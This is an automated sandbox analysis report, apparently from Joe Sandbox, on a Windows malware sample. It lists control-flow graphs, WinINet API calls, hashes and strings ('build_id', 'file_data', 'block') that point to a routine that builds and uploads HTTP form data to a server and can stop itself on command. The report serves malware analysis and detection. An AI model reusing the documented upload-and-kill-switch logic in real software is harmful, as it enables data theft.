                                                                                                                                                                                                                                                  control_flow_graph 274 407382-40745a call 41370e call 413740 call 406be0 call 414b70 call 41398e lstrlenA call 41398e call 414b70 call 41370e * 4 StrCmpCA 297 407489-4074c6 call 4148f3 call 413806 call 4137c0 call 413770 * 2 274->297 298 40745c-407483 call 41398e InternetOpenA 274->298 320 4074f2-407519 call 413860 call 413806 297->320 321 4074c8-4074eb 297->321 298->297 304 407cd0-407d10 call 4147f4 * 2 call 41395a * 4 call 413740 298->304 334 407d15-407d66 call 413770 * 9 304->334 330 407533-4075de call 413860 call 4137c0 call 413770 * 3 call 413860 call 413806 call 4137c0 call 413770 * 2 InternetConnectA 320->330 331 40751b-40752c 320->331 321->320 330->304 372 4075e4-40761c HttpOpenRequestA 330->372 331->330 373 407622-407624 372->373 374 407cc9-407cca InternetCloseHandle 372->374 375 407644-40764e 373->375 376 407626-40763e InternetSetOptionA 373->376 374->304 377 407650-40766a 375->377 378 407671-4076b8 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 375->378 376->375 377->378 391 4076d1-40772e call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 378->391 392 4076ba-4076ca 378->392 411 407730-407743 391->411 412 40774a-407817 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 391->412 392->391 411->412 455 407837-4079fb call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 4025a9 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 412->455 456 407819-407830 412->456 555 407a1d-407b29 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 41398e lstrlenA call 41398e lstrlenA GetProcessHeap RtlAllocateHeap call 41398e * 2 lstrlenA memcpy call 41398e lstrlenA memcpy call 41398e lstrlenA call 41398e * 2 lstrlenA memcpy 455->555 556 4079fd-407a16 455->556 456->455 585 407b2c-407b60 call 41398e lstrlenA call 41398e HttpSendRequestA 555->585 556->555 590 407b62-407b75 Sleep 585->590 591 407bbf-407bed call 4147f4 HttpQueryInfoA 585->591 592 407b77-407b7a 590->592 593 407b7c-407b8e call 4147f4 590->593 598 407bf3-407bfe call 4147cc 591->598 599 407d69-407d70 591->599 592->585 592->593 602 407b90-407ba3 593->602 603 407baa-407bba call 41370e 593->603 598->599 610 407c04-407c1f InternetReadFile 598->610 600 407d72-407d85 599->600 601 407d8c-407d99 call 41370e 599->601 600->601 601->334 602->603 603->334 611 407c21-407c26 610->611 612 407c75-407c8a call 41398e 610->612 611->612 613 407c28 611->613 618 407ca6-407cb3 StrCmpCA 612->618 619 407c8c-407c9f 612->619 615 407c2b-407c6c call 413860 call 4137c0 call 413770 InternetReadFile 613->615 615->612 627 407c6e-407c73 615->627 621 407cb5-407cb7 ExitProcess 618->621 622 407cbd-407cc6 InternetCloseHandle 618->622 619->618 622->374 627->612 627->615
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                    • Part of subcall function 00414B70: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,004073EC,?,?,?,?,?), ref: 00414BA6
                                                                                                                                                                                                                                                    • Part of subcall function 00414B70: GetProcessHeap.KERNEL32(?,004073EC,?,?,?,?,?), ref: 00414BB9
                                                                                                                                                                                                                                                    • Part of subcall function 00414B70: RtlAllocateHeap.NTDLL(00000000,00000008,?,?,004073EC,?,?,?,?,?), ref: 00414BC3
                                                                                                                                                                                                                                                    • Part of subcall function 00414B70: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,004073EC,?,?,?,?,?), ref: 00414BDA
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?), ref: 004073FA
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042EEFC,0042EEFC,0042EEFC,0042EEFC,?,?,00000000,00000000), ref: 00407449
                                                                                                                                                                                                                                                  • InternetOpenA.WININET ref: 0040747C
                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 004075D6
                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00407611
                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(?,0000001F,FFFFFFFF,00000004), ref: 0040763E
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,",?,?,file_data,?,?,?,?,00633851,?,?,?,?), ref: 00407A63
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407A79
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00407A85
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00407A92
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407AB1
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,0041A9AE,00000000), ref: 00407AB8
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00000014), ref: 00407AD1
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000014), ref: 00407ADC
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00407AF5
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00407B17
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00407B1C
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00407B45
                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407B5B
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00407B69
                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00407BE2
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 00407C17
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00407C64
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,block,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00407CAC
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00407CB7
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00407CC0
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00407CCA
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$AllocateBinaryCloseCryptFileHandleOpenReadRequestStringlstrcat$ConnectCrackExitInfoOptionQuerySendSleep
                                                                                                                                                                                                                                                  • String ID: ------$"$--$------$block$build_id$file_data
                                                                                                                                                                                                                                                  • API String ID: 2371931802-3773912656
                                                                                                                                                                                                                                                  • Opcode ID: e6b27f7c5fb395c915c855a183409fb9bed813d943871a9821f556bd1914e2b2
                                                                                                                                                                                                                                                  • Instruction ID: 8ef9556bcb9b27fc7718986cd64f5425e1259ef4970f3e192c21128dbb4bf585
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6b27f7c5fb395c915c855a183409fb9bed813d943871a9821f556bd1914e2b2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 974295F4A001185BDB06BF628C56AFE7A6AAF81749F00542EF405672D2CF3C5F858BD9
                                                                                                                                                                                                                                                  Function 00407D9E Relevance: 60.2, APIs: 30, Strings: 4, Instructions: 686networkmemorystringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 628 407d9e-407e3e call 413740 call 406be0 call 41370e * 5 call 41398e InternetOpenA StrCmpCA 645 407e44-407e84 call 4148f3 call 413806 call 4137c0 call 413770 * 2 628->645 646 4085a5-4085c6 InternetCloseHandle call 41398e call 40af38 628->646 674 407e86-407e96 645->674 675 407e9d-407ec3 call 413860 call 4137c0 call 413770 645->675 656 408613-408635 call 4147f4 * 2 call 413740 646->656 657 4085c8-408611 call 413778 call 413860 call 4137c0 call 413770 GetProcessHeap HeapFree 646->657 677 408638-408692 call 413770 * 10 656->677 657->656 674->675 691 407ec5-407edf 675->691 692 407ee6-407f21 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 675->692 691->692 718 407f23-407f33 692->718 719 407f3a-407fea call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 413806 call 4137c0 call 413770 * 2 InternetConnectA 692->719 718->719 719->646 744 407ff0-408028 HttpOpenRequestA 719->744 745 40859e-40859f InternetCloseHandle 744->745 746 40802e-408032 744->746 745->646 747 408034-408045 InternetSetOptionA 746->747 748 40804b-40805b 746->748 747->748 749 40805d-408077 748->749 750 40807e-4080bf call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 748->750 749->750 763 4080c1-4080d1 750->763 764 4080d8-408135 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 750->764 763->764 783 408151-40821b call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 764->783 784 408137-40814a 764->784 827 40823b-40831b call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 4025a9 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 783->827 828 40821d-408234 783->828 784->783 879 408335-4083c6 call 413860 call 4137c0 call 413770 call 413860 call 4137c0 call 413770 call 413806 call 4137c0 call 413770 call 41398e lstrlenA call 41398e lstrlenA GetProcessHeap HeapAlloc 827->879 880 40831d-40832e 827->880 828->827 903 4084aa-4084d5 InternetCloseHandle * 3 879->903 904 4083cc-408432 call 41398e * 2 lstrlenA memcpy call 41398e lstrlenA call 41398e * 2 lstrlenA memcpy 879->904 880->879 906 4084f1-4084fb call 41370e 903->906 907 4084d7-4084ea 903->907 919 408434-408468 call 41398e lstrlenA call 41398e 904->919 906->677 907->906 925 408500-40851c call 4147f4 GetProcessHeap HeapFree 919->925 926 40846e-408481 Sleep 919->926 932 40851e-40853c InternetReadFile 925->932 928 408483-408486 926->928 929 408488-4084a8 call 4147f4 GetProcessHeap HeapFree 926->929 928->919 928->929 929->903 929->932 934 40858c-40859b InternetCloseHandle 932->934 935 40853e-408543 932->935 934->745 935->934 936 408545 935->936 937 408548-408583 call 413860 call 4137c0 call 413770 InternetReadFile 936->937 937->934 944 408585-40858a 937->944 944->934 944->937
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  • InternetOpenA.WININET(?,?,?,?,?), ref: 00407E29
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?,?,?,?,?), ref: 00407E36
                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 00407FDC
                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040801D
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,",?,?,mode,?,?,?,?,00633851,?), ref: 00408396
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004083A9
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 004083B5
                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000000), ref: 004083C2
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004083E7
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000), ref: 004083EC
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00633851,?,?,?,?,00000014,?,?), ref: 00408403
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00633851,?,?,?,?,00000014,?,?), ref: 00408425
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,00633851,?,?,?,?,00000014,?,?), ref: 0040842A
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00633851,?,?,?,?,00000014), ref: 0040844D
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,00633851,?,?,?,?,00000014), ref: 00408475
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00633851,?,?,?,?,00000014), ref: 0040849A
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00633851,?,?,?,?), ref: 004084A4
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004084AD
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004084B6
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004084BF
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00633851,?,?,?,?,00000014), ref: 00408512
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00633851,?,?,?,?), ref: 0040851C
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000000C7,?), ref: 00408531
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,00000000,000000C7,?), ref: 0040857B
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 0040858F
                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 00408045
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040859F
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004085A6
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,0042EEFC,00000000,?,?,?,?,?,?,?), ref: 00408602
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 00408611
                                                                                                                                                                                                                                                    • Part of subcall function 004148F3: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042EEFC,00407497,?,00000014), ref: 00414960
                                                                                                                                                                                                                                                    • Part of subcall function 004148F3: lstrlenA.KERNEL32(00000000), ref: 004149BE
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$lstrlen$Heap$CloseHandle$lstrcpy$Process$Free$FileOpenReadlstrcatmemcpy$AllocConnectCrackHttpOptionRequestSleepSystemTime
                                                                                                                                                                                                                                                  • String ID: "$------$build_id$mode
                                                                                                                                                                                                                                                  • API String ID: 2829941862-3829489455
                                                                                                                                                                                                                                                  • Opcode ID: b6ac0e4d20e8280c00ee4a52078a176f0a01ba546a3fa830e67fac002179915b
                                                                                                                                                                                                                                                  • Instruction ID: c4bafd15bbe72c7753f75c76ce33fb2b6cfcd0d70a8ce77783aecb50f14d315a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6ac0e4d20e8280c00ee4a52078a176f0a01ba546a3fa830e67fac002179915b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5932A5F4A002185BCB15BF729C56AEF7B6BAF81745F00541EF416672D2CE3C9A448BE8
                                                                                                                                                                                                                                                  Function 0040B4F3 Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 269memoryfilestringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B5BB
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?), ref: 0040B5DE
                                                                                                                                                                                                                                                  • PathFileExistsA.SHLWAPI(00000000), ref: 0040B5FC
                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 0040B634
                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040B64B
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B665
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040B68A
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040B6A8
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B6B4
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 0040B6C2
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0040B6D6
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0040B70E
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,00000000), ref: 0040B7DE
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?), ref: 0040B7E9
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B7F1
                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 0040B7FC
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040B80F
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040B8E1
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040B8EF
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
